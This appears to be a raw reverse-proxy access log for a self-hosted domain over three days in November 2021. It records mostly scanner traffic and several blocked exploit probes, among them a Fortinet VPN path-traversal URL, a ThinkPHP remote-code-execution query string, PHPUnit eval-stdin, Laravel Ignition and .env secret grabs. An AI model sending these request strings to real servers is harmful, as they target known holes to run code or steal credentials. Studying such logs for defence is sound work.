"/" [Client 34.77.162.10] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [12/Nov/2021:21:14:37 +0000] 444 - OPTIONS https 64.22.31.253 "/" [Client 34.95.199.99] [Length 0] [Gzip -] "-" "-" [12/Nov/2021:21:20:24 +0000] 444 - GET https komga.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [12/Nov/2021:21:20:24 +0000] 444 - GET https komga.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [12/Nov/2021:21:42:32 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [12/Nov/2021:21:42:32 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [12/Nov/2021:21:42:32 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [12/Nov/2021:21:42:32 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [12/Nov/2021:21:42:32 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [12/Nov/2021:21:42:32 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [12/Nov/2021:22:13:33 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.196.217] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [12/Nov/2021:22:20:03 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [12/Nov/2021:22:39:48 +0000] 444 - GET https 64.22.31.253 "/" [Client 88.80.189.57] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0" "-" [12/Nov/2021:23:05:25 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.33.96.205] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [12/Nov/2021:23:29:02 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.60] [Length 0] [Gzip -] "-" "-" [12/Nov/2021:23:29:03 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.60] [Length 252] [Gzip -] "-" "-" [12/Nov/2021:23:29:03 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.60] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [13/Nov/2021:00:18:15 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.209.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [13/Nov/2021:00:22:08 +0000] 444 - GET https 64.22.31.253 "///remote/fgt_lang?lang=/../../../..//////////dev/" [Client 178.239.21.162] [Length 0] [Gzip -] "python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.41.1.el7.x86_64" "-" [13/Nov/2021:03:10:45 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.142.236.40] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [13/Nov/2021:03:10:47 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.142.236.40] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [13/Nov/2021:03:17:57 +0000] 444 - GET https jdownloader.moralanimal.net "/" [Client 34.86.35.27] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [13/Nov/2021:03:55:43 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [13/Nov/2021:03:55:43 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [13/Nov/2021:03:55:45 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [13/Nov/2021:03:55:48 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [13/Nov/2021:03:55:49 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [13/Nov/2021:03:55:51 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [13/Nov/2021:03:55:52 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [13/Nov/2021:03:55:55 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [13/Nov/2021:03:55:57 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [13/Nov/2021:03:55:58 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [13/Nov/2021:03:55:59 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [13/Nov/2021:03:56:00 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [13/Nov/2021:04:21:41 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.53.90.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36" "-" [13/Nov/2021:04:38:08 +0000] 444 - GET https opds.moralanimal.net "/" [Client 2.57.122.115] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [13/Nov/2021:04:38:08 +0000] 444 - GET https lndshark.moralanimal.net "/" [Client 2.57.122.115] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [13/Nov/2021:04:38:09 +0000] 444 - GET https router.moralanimal.net "/" [Client 2.57.122.115] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [13/Nov/2021:04:38:09 +0000] 444 - GET https komga.moralanimal.net "/" [Client 2.57.122.115] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [13/Nov/2021:04:38:09 +0000] 444 - GET https trilium.moralanimal.net "/" [Client 2.57.122.115] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [13/Nov/2021:04:38:09 +0000] 444 - GET https traefik.moralanimal.net "/" [Client 2.57.122.115] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [13/Nov/2021:04:38:09 +0000] 444 - GET https oauth.moralanimal.net "/" [Client 2.57.122.115] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [13/Nov/2021:04:38:09 +0000] 444 - GET https 64.22.31.253 "/" [Client 2.57.122.115] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [13/Nov/2021:04:38:09 +0000] 444 - GET https speedtest.moralanimal.net "/" [Client 2.57.122.115] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [13/Nov/2021:04:38:09 +0000] 444 - GET https jdownloader.moralanimal.net "/" [Client 2.57.122.115] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [13/Nov/2021:07:34:12 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.208.189] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [13/Nov/2021:09:33:42 +0000] 444 - POST https 64.22.31.253 "/_ignition/execute-solution" [Client 139.159.203.61] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Safari/605.1.15" "-" [13/Nov/2021:09:33:43 +0000] 444 - GET https 64.22.31.253 "/" [Client 139.159.203.61] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Safari/605.1.15" "-" [13/Nov/2021:09:33:43 +0000] 444 - GET https 64.22.31.253 "/script" [Client 139.159.203.61] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Safari/605.1.15" "-" [13/Nov/2021:09:33:44 +0000] 444 - GET https 64.22.31.253 "/manager/html" [Client 139.159.203.61] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Safari/605.1.15" "-" [13/Nov/2021:09:33:45 +0000] 444 - GET https 64.22.31.253 "/wp-login.php" [Client 139.159.203.61] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Safari/605.1.15" "-" [13/Nov/2021:09:33:46 +0000] 444 - GET https 64.22.31.253 "/?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=3zlfw2we" [Client 139.159.203.61] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Safari/605.1.15" "-" [13/Nov/2021:09:33:47 +0000] 444 - GET https 64.22.31.253 "/users/sign_in" [Client 139.159.203.61] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Safari/605.1.15" "-" [13/Nov/2021:09:42:52 +0000] 400 - GET http 64.22.31.253 "/.env" [Client 109.237.103.118] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [13/Nov/2021:09:42:53 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 109.237.103.118] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [13/Nov/2021:09:47:35 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [13/Nov/2021:09:56:04 +0000] 444 - GET https 64.22.31.253 "/" [Client 34.140.248.32] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [13/Nov/2021:10:17:03 +0000] 444 - GET https 64.22.31.253 "/" [Client 216.218.206.68] [Length 0] [Gzip -] "-" "-" [13/Nov/2021:11:25:27 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 45.87.61.71] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [13/Nov/2021:12:32:20 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [13/Nov/2021:14:41:25 +0000] 444 - GET https 64.22.31.253 "///remote/fgt_lang?lang=/../../../..//////////dev/" [Client 178.239.21.162] [Length 0] [Gzip -] "python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.41.1.el7.x86_64" "-" [13/Nov/2021:15:30:46 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.141.34] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [13/Nov/2021:16:49:51 +0000] 444 - GET https 64.22.31.253 "//gettext.js" [Client 61.135.15.183] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 7.0; HUAWEI P20 Build/816.012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4472.114 Mobile Safari/537.36" "-" [13/Nov/2021:16:49:51 +0000] 444 - GET https 64.22.31.253 "//js/ext-base-debug.js" [Client 61.135.15.183] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 10.0; MI 2 Build/O012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4472.114 Mobile Safari/537.36" "-" [13/Nov/2021:16:49:51 +0000] 444 - GET https 64.22.31.253 "//js/ext-extensions-debug.js" [Client 61.135.15.183] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 8.0; OPPO x20 70816.012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36" "-" [13/Nov/2021:16:49:51 +0000] 444 - GET https 64.22.31.253 "//js/deluge-all-debug.js" [Client 61.135.15.183] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 7.0; OPPO x22 6.012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4472.114 Mobile Safari/537.36" "-" [13/Nov/2021:16:49:51 +0000] 444 - GET https 64.22.31.253 "//js/ext-all-debug.js" [Client 61.135.15.183] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 9.0; MI 10 Build/123012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36" "-" [13/Nov/2021:17:07:23 +0000] 400 - GET http localhost "/" [Client 8.217.57.218] [Length 154] [Gzip -] "-" "-" [13/Nov/2021:17:58:39 +0000] 444 - GET https 64.22.31.253 "/" [Client 182.161.66.103] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36" "-" [13/Nov/2021:18:04:05 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [13/Nov/2021:18:04:05 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [13/Nov/2021:18:04:05 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [13/Nov/2021:18:04:05 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [13/Nov/2021:18:04:05 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [13/Nov/2021:18:04:05 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [13/Nov/2021:18:53:38 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.114] [Length 0] [Gzip -] "-" "-" [13/Nov/2021:18:53:39 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.114] [Length 252] [Gzip -] "-" "-" [13/Nov/2021:18:53:39 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.114] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [13/Nov/2021:19:27:59 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.133.58] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [13/Nov/2021:19:59:25 +0000] 444 - GET https 64.22.31.253 "/" [Client 180.149.125.171] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36" "-" [13/Nov/2021:20:49:29 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.134.144.42] [Length 0] [Gzip -] "libwww-perl/6.57" "-" [13/Nov/2021:22:44:03 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.203.184] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [13/Nov/2021:23:11:30 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.209.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [14/Nov/2021:01:58:40 +0000] 444 - GET https 64.22.31.253 "/" [Client 64.62.197.92] [Length 0] [Gzip -] "-" "-" [14/Nov/2021:02:09:50 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" [14/Nov/2021:02:49:19 +0000] 444 - GET https 64.22.31.253 "/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" [Client 185.191.32.158] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36" "-" [14/Nov/2021:02:49:21 +0000] 400 - GET http 64.22.31.253 "/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" [Client 185.191.32.158] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36" "-" [14/Nov/2021:03:20:36 +0000] 444 - GET https tpm.moralanimal.net "/" [Client 92.118.160.45] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [14/Nov/2021:04:08:30 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.209.184] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [14/Nov/2021:05:38:53 +0000] 444 - GET https 64.22.31.253 "/" [Client 212.102.34.151] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F" "-" [14/Nov/2021:06:37:56 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [14/Nov/2021:06:49:24 +0000] 444 - GET https 64.22.31.253 "/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" [Client 80.82.65.247] [Length 0] [Gzip -] "Python-urllib/3.6" "-" [14/Nov/2021:07:36:44 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [14/Nov/2021:07:39:50 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.205.222] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [14/Nov/2021:08:20:45 +0000] 444 - GET https 64.22.31.253 "/" [Client 159.223.21.224] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) Project-Resonance (http://project-resonance.com/) (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" "-" [14/Nov/2021:08:30:28 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.129.64.132] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [14/Nov/2021:08:30:36 +0000] 400 - - https localhost "-" [Client 185.220.100.247] [Length 154] [Gzip -] "-" "-" [14/Nov/2021:08:30:46 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 185.220.100.253] [Length 0] [Gzip -] "-" "-" [14/Nov/2021:08:30:48 +0000] 444 - OPTIONS https localhost "/" [Client 199.249.230.163] [Length 0] [Gzip -] "-" "-" [14/Nov/2021:08:30:56 +0000] 400 - - https localhost "-" [Client 23.129.64.142] [Length 154] [Gzip -] "-" "-" [14/Nov/2021:08:40:39 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [14/Nov/2021:09:17:25 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.197.249] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [14/Nov/2021:09:40:26 +0000] 444 - GET https 64.22.31.253 "/" [Client 35.195.93.98] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [14/Nov/2021:09:45:32 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [14/Nov/2021:09:47:55 +0000] 444 - GET https 64.22.31.253 "/login?returnURL=%2F" [Client 92.118.160.5] [Length 0] [Gzip -] "Go http package" "-" [14/Nov/2021:10:15:51 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.94.138.41] [Length 0] [Gzip -] "-" "-" [14/Nov/2021:10:15:52 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.41] [Length 252] [Gzip -] "-" "-" [14/Nov/2021:10:15:52 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.41] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [14/Nov/2021:10:16:46 +0000] 400 - - http localhost "-" [Client 45.146.164.132] [Length 154] [Gzip -] "-" "-" [14/Nov/2021:10:50:01 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [14/Nov/2021:11:25:04 +0000] 444 - GET https 64.22.31.253 "/" [Client 80.82.77.192] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" [14/Nov/2021:11:32:13 +0000] 400 - GET http 64.22.31.253 "/" [Client 80.82.77.192] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [14/Nov/2021:11:53:29 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [14/Nov/2021:12:27:46 +0000] 444 - GET https whoami.moralanimal.net "/" [Client 92.118.160.5] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [14/Nov/2021:12:52:54 +0000] 444 - GET https 64.22.31.253 "/" [Client 132.248.31.18] [Length 0] [Gzip -] "curl/7.58.0" "-" [14/Nov/2021:15:01:18 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [14/Nov/2021:16:01:59 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [14/Nov/2021:16:10:29 +0000] 444 - GET https speedtest.moralanimal.net "/" [Client 92.118.160.13] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [14/Nov/2021:16:26:17 +0000] 444 - GET https jdownloader.moralanimal.net "/" [Client 92.118.160.57] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [14/Nov/2021:17:03:24 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [14/Nov/2021:17:47:15 +0000] 